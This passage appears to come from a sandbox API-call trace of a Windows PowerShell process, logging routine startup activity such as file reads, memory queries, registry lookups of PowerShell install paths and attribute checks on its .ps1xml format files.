lpNumberOfBytesRead=0x1ad388*=0x1000, lpOverlapped=0x0) returned 1 [0073.509] ReadFile (in: hFile=0x34c, lpBuffer=0x2d563d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad388, lpOverlapped=0x0 | out: lpBuffer=0x2d563d8*, lpNumberOfBytesRead=0x1ad388*=0x1000, lpOverlapped=0x0) returned 1 [0073.509] ReadFile (in: hFile=0x34c, lpBuffer=0x2d563d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad388, lpOverlapped=0x0 | out: lpBuffer=0x2d563d8*, lpNumberOfBytesRead=0x1ad388*=0x1000, lpOverlapped=0x0) returned 1 [0073.510] ReadFile (in: hFile=0x34c, lpBuffer=0x2d563d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad388, lpOverlapped=0x0 | out: lpBuffer=0x2d563d8*, lpNumberOfBytesRead=0x1ad388*=0x1000, lpOverlapped=0x0) returned 1 [0073.513] ReadFile (in: hFile=0x34c, lpBuffer=0x2d563d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad388, lpOverlapped=0x0 | out: lpBuffer=0x2d563d8*, lpNumberOfBytesRead=0x1ad388*=0x1000, lpOverlapped=0x0) returned 1 [0073.513] ReadFile (in: hFile=0x34c, lpBuffer=0x2d563d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad388, lpOverlapped=0x0 | out: lpBuffer=0x2d563d8*, lpNumberOfBytesRead=0x1ad388*=0x1000, lpOverlapped=0x0) returned 1 [0073.513] ReadFile (in: hFile=0x34c, lpBuffer=0x2d563d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad388, lpOverlapped=0x0 | out: lpBuffer=0x2d563d8*, lpNumberOfBytesRead=0x1ad388*=0x1000, lpOverlapped=0x0) returned 1 [0073.514] ReadFile (in: hFile=0x34c, lpBuffer=0x2d563d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad388, lpOverlapped=0x0 | out: lpBuffer=0x2d563d8*, lpNumberOfBytesRead=0x1ad388*=0x1000, lpOverlapped=0x0) returned 1 [0073.514] ReadFile (in: hFile=0x34c, lpBuffer=0x2d563d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad388, lpOverlapped=0x0 | out: lpBuffer=0x2d563d8*, lpNumberOfBytesRead=0x1ad388*=0x1000, lpOverlapped=0x0) returned 1 [0073.514] ReadFile (in: hFile=0x34c, lpBuffer=0x2d563d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad388, lpOverlapped=0x0 | out: lpBuffer=0x2d563d8*, lpNumberOfBytesRead=0x1ad388*=0x1000, lpOverlapped=0x0) returned 1 [0073.514] ReadFile (in: hFile=0x34c, lpBuffer=0x2d563d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad388, lpOverlapped=0x0 | out: lpBuffer=0x2d563d8*, lpNumberOfBytesRead=0x1ad388*=0x1000, lpOverlapped=0x0) returned 1 [0073.515] ReadFile (in: hFile=0x34c, lpBuffer=0x2d563d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad388, lpOverlapped=0x0 | out: lpBuffer=0x2d563d8*, lpNumberOfBytesRead=0x1ad388*=0x1000, lpOverlapped=0x0) returned 1 [0073.515] ReadFile (in: hFile=0x34c, lpBuffer=0x2d563d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad388, lpOverlapped=0x0 | out: lpBuffer=0x2d563d8*, lpNumberOfBytesRead=0x1ad388*=0x1b4, lpOverlapped=0x0) returned 1 [0073.515] ReadFile (in: hFile=0x34c, lpBuffer=0x2d563d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad388, lpOverlapped=0x0 | out: lpBuffer=0x2d563d8*, lpNumberOfBytesRead=0x1ad388*=0x0, lpOverlapped=0x0) returned 1 [0073.515] CloseHandle (hObject=0x34c) returned 1 [0073.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ad0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0073.516] SetErrorMode (uMode=0x1) returned 0x1 [0073.516] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad300 | out: lpFileInformation=0x1ad300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1 [0073.516] SetErrorMode (uMode=0x1) returned 0x1 [0073.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ad030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0073.516] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad3e8 | out: phkResult=0x1ad3e8*=0x34c) returned 0x0 [0073.516] RegQueryValueExW (in: hKey=0x34c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad36c, lpData=0x0, lpcbData=0x1ad368*=0x0 | out: lpType=0x1ad36c*=0x1, lpData=0x0, lpcbData=0x1ad368*=0x56) returned 0x0 [0073.516] CoTaskMemAlloc (cb=0x5a) returned 0x3eed40 [0073.516] RegQueryValueExW (in: hKey=0x34c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad33c, lpData=0x3eed40, lpcbData=0x1ad338*=0x56 | out: lpType=0x1ad33c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad338*=0x56) returned 0x0 [0073.516] CoTaskMemFree (pv=0x3eed40) [0073.516] RegCloseKey (hKey=0x34c) returned 0x0 [0073.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ad030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0073.517] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1acee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0073.645] VirtualQuery (in: lpAddress=0x1ac0d0, lpBuffer=0x1acf90, dwLength=0x30 | out: lpBuffer=0x1acf90*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.653] VirtualQuery (in: lpAddress=0x1ac0d0, lpBuffer=0x1acf90, dwLength=0x30 | out: lpBuffer=0x1acf90*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.656] VirtualQuery (in: lpAddress=0x1ac0d0, lpBuffer=0x1acf90, dwLength=0x30 | out: lpBuffer=0x1acf90*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.657] VirtualQuery (in: lpAddress=0x1ac0d0, lpBuffer=0x1acf90, dwLength=0x30 | out: lpBuffer=0x1acf90*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.657] VirtualQuery (in: lpAddress=0x1ac0d0, lpBuffer=0x1acf90, dwLength=0x30 | out: lpBuffer=0x1acf90*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.658] VirtualQuery (in: lpAddress=0x1ac0d0, lpBuffer=0x1acf90, dwLength=0x30 | out: lpBuffer=0x1acf90*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.658] VirtualQuery (in: lpAddress=0x1ac0d0, lpBuffer=0x1acf90, dwLength=0x30 | out: lpBuffer=0x1acf90*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.676] VirtualQuery (in: lpAddress=0x1ac0d0, lpBuffer=0x1acf90, dwLength=0x30 | out: lpBuffer=0x1acf90*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.686] VirtualQuery (in: lpAddress=0x1ac0d0, lpBuffer=0x1acf90, dwLength=0x30 | out: lpBuffer=0x1acf90*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.686] VirtualQuery (in: lpAddress=0x1ac0d0, lpBuffer=0x1acf90, dwLength=0x30 | out: lpBuffer=0x1acf90*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.686] VirtualQuery (in: lpAddress=0x1ac0d0, lpBuffer=0x1acf90, dwLength=0x30 | out: lpBuffer=0x1acf90*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.686] VirtualQuery (in: lpAddress=0x1ac0d0, lpBuffer=0x1acf90, dwLength=0x30 | out: lpBuffer=0x1acf90*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.687] VirtualQuery (in: lpAddress=0x1ac0d0, lpBuffer=0x1acf90, dwLength=0x30 | out: lpBuffer=0x1acf90*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.687] VirtualQuery (in: lpAddress=0x1ac0d0, lpBuffer=0x1acf90, dwLength=0x30 | out: lpBuffer=0x1acf90*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.687] VirtualQuery (in: lpAddress=0x1ac0d0, lpBuffer=0x1acf90, dwLength=0x30 | out: lpBuffer=0x1acf90*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.687] VirtualQuery (in: lpAddress=0x1ac0d0, lpBuffer=0x1acf90, dwLength=0x30 | out: lpBuffer=0x1acf90*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.695] VirtualQuery (in: lpAddress=0x1ac0d0, lpBuffer=0x1acf90, dwLength=0x30 | out: lpBuffer=0x1acf90*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.701] VirtualQuery (in: lpAddress=0x1ac0d0, lpBuffer=0x1acf90, dwLength=0x30 | out: lpBuffer=0x1acf90*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.702] VirtualQuery (in: lpAddress=0x1ac0d0, lpBuffer=0x1acf90, dwLength=0x30 | out: lpBuffer=0x1acf90*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.702] VirtualQuery (in: lpAddress=0x1ac0d0, lpBuffer=0x1acf90, dwLength=0x30 | out: lpBuffer=0x1acf90*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.703] VirtualQuery (in: lpAddress=0x1ac0d0, lpBuffer=0x1acf90, dwLength=0x30 | out: lpBuffer=0x1acf90*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.703] VirtualQuery (in: lpAddress=0x1ac0d0, lpBuffer=0x1acf90, dwLength=0x30 | out: lpBuffer=0x1acf90*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.704] VirtualQuery (in: lpAddress=0x1ac0d0, lpBuffer=0x1acf90, dwLength=0x30 | out: lpBuffer=0x1acf90*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.704] VirtualQuery (in: lpAddress=0x1ac0d0, lpBuffer=0x1acf90, dwLength=0x30 | out: lpBuffer=0x1acf90*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.704] VirtualQuery (in: lpAddress=0x1ac0d0, lpBuffer=0x1acf90, dwLength=0x30 | out: lpBuffer=0x1acf90*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.705] VirtualQuery (in: lpAddress=0x1ac0d0, lpBuffer=0x1acf90, dwLength=0x30 | out: lpBuffer=0x1acf90*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.706] VirtualQuery (in: lpAddress=0x1ac0d0, lpBuffer=0x1acf90, dwLength=0x30 | out: lpBuffer=0x1acf90*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.706] VirtualQuery (in: lpAddress=0x1ac0d0, lpBuffer=0x1acf90, dwLength=0x30 | out: lpBuffer=0x1acf90*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.706] VirtualQuery (in: lpAddress=0x1ac0d0, lpBuffer=0x1acf90, dwLength=0x30 | out: lpBuffer=0x1acf90*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.706] VirtualQuery (in: lpAddress=0x1ac0d0, lpBuffer=0x1acf90, dwLength=0x30 | out: lpBuffer=0x1acf90*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.710] VirtualQuery (in: lpAddress=0x1ac0d0, lpBuffer=0x1acf90, dwLength=0x30 | out: lpBuffer=0x1acf90*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.714] VirtualQuery (in: lpAddress=0x1ac0e0, lpBuffer=0x1acfa0, dwLength=0x30 | out: lpBuffer=0x1acfa0*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.714] VirtualQuery (in: lpAddress=0x1ac0e0, lpBuffer=0x1acfa0, dwLength=0x30 | out: lpBuffer=0x1acfa0*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.715] VirtualQuery (in: lpAddress=0x1ac0d0, lpBuffer=0x1acf90, dwLength=0x30 | out: lpBuffer=0x1acf90*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.716] VirtualQuery (in: lpAddress=0x1ac0d0, lpBuffer=0x1acf90, dwLength=0x30 | out: lpBuffer=0x1acf90*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.750] VirtualQuery (in: lpAddress=0x1ac0d0, lpBuffer=0x1acf90, dwLength=0x30 | out: lpBuffer=0x1acf90*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.751] VirtualQuery (in: lpAddress=0x1ac0d0, lpBuffer=0x1acf90, dwLength=0x30 | out: lpBuffer=0x1acf90*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.751] VirtualQuery (in: lpAddress=0x1ac0d0, lpBuffer=0x1acf90, dwLength=0x30 | out: lpBuffer=0x1acf90*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.755] CoTaskMemAlloc (cb=0x104) returned 0x3e46f0 [0073.755] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e46f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0073.755] CoTaskMemFree (pv=0x3e46f0) [0073.757] VirtualQuery (in: lpAddress=0x1ac0d0, lpBuffer=0x1acf90, dwLength=0x30 | out: lpBuffer=0x1acf90*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.760] VirtualQuery (in: lpAddress=0x1ac0d0, lpBuffer=0x1acf90, dwLength=0x30 | out: lpBuffer=0x1acf90*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.760] VirtualQuery (in: lpAddress=0x1ac0d0, lpBuffer=0x1acf90, dwLength=0x30 | out: lpBuffer=0x1acf90*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.761] VirtualQuery (in: lpAddress=0x1ac0d0, lpBuffer=0x1acf90, dwLength=0x30 | out: lpBuffer=0x1acf90*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.761] VirtualQuery (in: lpAddress=0x1ac0d0, lpBuffer=0x1acf90, dwLength=0x30 | out: lpBuffer=0x1acf90*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.761] VirtualQuery (in: lpAddress=0x1ac0d0, lpBuffer=0x1acf90, dwLength=0x30 | out: lpBuffer=0x1acf90*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.761] VirtualQuery (in: lpAddress=0x1ac0d0, lpBuffer=0x1acf90, dwLength=0x30 | out: lpBuffer=0x1acf90*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.763] VirtualQuery (in: lpAddress=0x1ac0d0, lpBuffer=0x1acf90, dwLength=0x30 | out: lpBuffer=0x1acf90*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.764] VirtualQuery (in: lpAddress=0x1ac0d0, lpBuffer=0x1acf90, dwLength=0x30 | out: lpBuffer=0x1acf90*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.764] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad588 | out: phkResult=0x1ad588*=0x348) returned 0x0 [0073.764] RegQueryValueExW (in: hKey=0x348, lpValueName="path", lpReserved=0x0, lpType=0x1ad59c, lpData=0x0, lpcbData=0x1ad598*=0x0 | out: lpType=0x1ad59c*=0x1, lpData=0x0, lpcbData=0x1ad598*=0x74) returned 0x0 [0073.765] RegQueryValueExW (in: hKey=0x348, lpValueName="path", lpReserved=0x0, lpType=0x1ad50c, lpData=0x0, lpcbData=0x1ad508*=0x0 | out: lpType=0x1ad50c*=0x1, lpData=0x0, lpcbData=0x1ad508*=0x74) returned 0x0 [0073.765] CoTaskMemAlloc (cb=0x78) returned 0x41a760 [0073.765] RegQueryValueExW (in: hKey=0x348, lpValueName="path", lpReserved=0x0, lpType=0x1ad4dc, lpData=0x41a760, lpcbData=0x1ad4d8*=0x74 | out: lpType=0x1ad4dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x1ad4d8*=0x74) returned 0x0 [0073.765] CoTaskMemFree (pv=0x41a760) [0073.765] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x1ad250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a [0073.765] SetErrorMode (uMode=0x1) returned 0x1 [0073.765] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1ad460 | out: lpFileInformation=0x1ad460*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0073.765] SetErrorMode (uMode=0x1) returned 0x1 [0073.765] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ad250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0073.765] SetErrorMode (uMode=0x1) returned 0x1 [0073.766] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad460 | out: lpFileInformation=0x1ad460*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1 [0073.766] SetErrorMode (uMode=0x1) returned 0x1 [0073.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ad250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0073.766] SetErrorMode (uMode=0x1) returned 0x1 [0073.766] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad460 | out: lpFileInformation=0x1ad460*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1 [0073.766] SetErrorMode (uMode=0x1) returned 0x1 [0073.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ad250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0073.766] SetErrorMode (uMode=0x1) returned 0x1 [0073.766] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad460 | out: lpFileInformation=0x1ad460*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1 [0073.766] SetErrorMode (uMode=0x1) returned 0x1 [0073.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ad250, lpFilePart=0x0 | out: 